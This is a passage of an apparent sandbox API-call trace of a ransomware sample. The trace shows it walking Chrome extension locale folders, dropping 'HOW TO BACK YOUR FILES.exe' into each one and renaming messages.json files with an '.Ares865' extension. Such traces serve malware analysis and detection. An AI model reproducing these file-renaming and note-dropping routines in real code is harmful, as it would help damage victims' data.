Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.345] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=710) returned 1 [0101.355] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr" [0101.355] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr" [0101.355] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.356] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.356] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.356] GetLastError () returned 0x0 [0101.357] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x827412b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e527860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e527860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.357] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.357] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.357] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.357] lstrlenW (lpString="messages.json") returned 13 [0101.357] lstrlenW (lpString="Ares865") returned 7 [0101.357] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.357] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.Ares865") returned 164 [0101.357] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.359] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=633) returned 1 [0101.362] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi" [0101.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi" [0101.362] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.362] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.362] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.363] GetLastError () returned 0x0 [0101.363] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.363] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82728c10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.363] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.363] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.363] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.363] lstrlenW (lpString="messages.json") returned 13 [0101.363] lstrlenW (lpString="Ares865") returned 7 [0101.363] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.364] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.Ares865") returned 164 [0101.364] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.365] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=941) returned 1 [0101.368] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr" [0101.368] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr" [0101.368] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.368] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.369] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.369] GetLastError () returned 0x0 [0101.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.369] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8271efd0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.369] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.369] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.370] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.370] lstrlenW (lpString="messages.json") returned 13 [0101.370] lstrlenW (lpString="Ares865") returned 7 [0101.370] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.370] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.Ares865") returned 164 [0101.370] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.371] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.372] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=708) returned 1 [0101.375] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil" [0101.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil" [0101.375] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.376] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.376] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.376] GetLastError () returned 0x0 [0101.377] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.377] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82715390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.377] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.377] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.377] lstrcpyW (in: lpString1=0x2cce520, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.377] lstrlenW (lpString="messages.json") returned 13 [0101.377] lstrlenW (lpString="Ares865") returned 7 [0101.377] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.377] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.Ares865") returned 165 [0101.377] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.379] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=692) returned 1 [0101.384] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi" [0101.384] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi" [0101.384] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.384] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.385] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.385] GetLastError () returned 0x0 [0101.385] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.385] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82709040, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e54d9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e54d9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.385] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.385] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.385] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" 